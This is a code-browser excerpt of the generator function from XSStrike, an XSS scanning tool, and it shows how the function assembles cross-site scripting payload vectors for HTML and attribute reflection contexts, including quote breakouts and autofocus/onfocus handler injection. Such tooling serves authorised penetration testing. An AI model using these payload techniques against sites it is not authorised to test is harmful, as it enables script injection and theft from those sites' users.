hub / github.com/s0md3v/XSStrike / generator

Function generator

core/generator.py:6–172  ·  view source on GitHub ↗
(occurences, response)

Source from the content-addressed store, hash-verified

6def generator(occurences, response):
7 scripts = extractScripts(response)
8 index = 0
9 vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
10 6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
11 for i in occurences:
12 context = occurences[i]['context']
13 if context == 'html':
14 lessBracketEfficiency = occurences[i]['score']['<']
15 greatBracketEfficiency = occurences[i]['score']['>']
16 ends = ['//']
17 badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
18 if greatBracketEfficiency == 100:
19 ends.append('>')
20 if lessBracketEfficiency:
21 payloads = genGen(fillings, eFillings, lFillings,
22 eventHandlers, tags, functions, ends, badTag)
23 for payload in payloads:
24 vectors[10].add(payload)
25 elif context == 'attribute':
26 found = False
27 tag = occurences[i]['details']['tag']
28 Type = occurences[i]['details']['type']
29 quote = occurences[i]['details']['quote'] or ''
30 attributeName = occurences[i]['details']['name']
31 attributeValue = occurences[i]['details']['value']
32 quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100
33 greatBracketEfficiency = occurences[i]['score']['>']
34 ends = ['//']
35 if greatBracketEfficiency == 100:
36 ends.append('>')
37 if greatBracketEfficiency == 100 and quoteEfficiency == 100:
38 payloads = genGen(fillings, eFillings, lFillings,
39 eventHandlers, tags, functions, ends)
40 for payload in payloads:
41 payload = quote + '>' + payload
42 found = True
43 vectors[9].add(payload)
44 if quoteEfficiency == 100:
45 for filling in fillings:
46 for function in functions:
47 vector = quote + filling + r('autofocus') + \
48 filling + r('onfocus') + '=' + quote + function
49 found = True
50 vectors[8].add(vector)
51 if quoteEfficiency == 90:
52 for filling in fillings:
53 for function in functions:
54 vector = '\\' + quote + filling + r('autofocus') + filling + \
55 r('onfocus') + '=' + function + filling + '\\' + quote
56 found = True
57 vectors[7].add(vector)
58 if Type == 'value':
59 if attributeName == 'srcdoc':
60 if occurences[i]['score']['&lt;']:
61 if occurences[i]['score']['&gt;']:
62 del ends[:]
63 ends.append('%26gt;')

Callers 2

crawlFunction · 0.90
scanFunction · 0.90

Calls 3

extractScriptsFunction · 0.90
genGenFunction · 0.90
jsContexterFunction · 0.90

Tested by

no test coverage detected